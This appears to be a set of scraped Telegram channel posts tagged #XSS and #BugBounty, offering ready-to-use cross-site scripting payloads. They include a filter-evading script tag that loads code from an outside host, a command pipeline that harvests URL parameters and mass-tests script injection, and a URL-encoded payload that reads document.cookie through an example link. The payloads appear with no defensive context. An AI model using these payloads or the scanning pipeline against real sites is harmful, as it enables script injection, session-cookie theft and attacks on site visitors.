1"/import(src)'<Script/Src=//X55.is?1=00><Img/OnLoad='
#XSS
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥9 3❤2
echo "testphp.vulnweb.com" | waybackurls | egrep -iv ".(jpg|jpeg|gif|css|tif|tiff|png|ttf|woff|woff2|icon|pdf|svg|txt|js)" | urldedupe -s | grep -IE "[?].*[&]?" | grep "=" | unew -p | pvreplace '<sCript>confirm(1)</sCript>, <script>confirm(1)</script>' | xsschecker -match '<sCript>confirm(1)</sCript>, <script>confirm(1)</script>' -vuln
BugCod3
( ZIP )#XSS #BugBounty
Please open Telegram to view this post
VIEW IN TELEGRAM
Payload=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
Full_url= https://site. com/?invitedby=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
#XSS #BugBounty
Please open Telegram to view this post
VIEW IN TELEGRAM
Payload:
`'>+<script>alert()</script>`
#BugBounty #Tips #XSS
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥8💯2🎃1